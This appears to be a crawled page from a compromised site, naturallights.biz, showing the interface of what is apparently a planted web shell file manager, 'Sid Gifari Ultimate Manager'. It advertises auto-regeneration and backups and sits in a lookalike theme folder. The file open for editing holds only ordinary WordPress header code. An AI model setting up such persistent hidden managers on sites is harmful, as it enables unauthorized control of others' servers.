⚡ Sid Gifari Ultimate Manager v8.2
Auto-Regeneration System • cPanel Protected
Protected:
Active
Backups:
5/6
WordPress:
Not Found
Force Regeneration
Root
home
logoandw
public_html
naturallights.biz
wp-content
themes
twentytvventytree
Editing: menu.php
Save
Cancel
<?php /** * @package WordPress * @subpackage WP-Skeleton */ ?> <div class="header"> <div class="seven columns alpha"> <div class="logo"> <a href="<?php echo home_url(); //make logo a home link?>"> <h1><?php echo get_bloginfo('name');?></h1> <h5><?php echo get_bloginfo('description');?></h5> </a> </div> </div> <div class="offset-by-one omega"> <!-- the Menu --> <?php wp_nav_menu( array( 'theme_location' => 'primary' ) ); ?> </div> </div> <!-- End blog header -->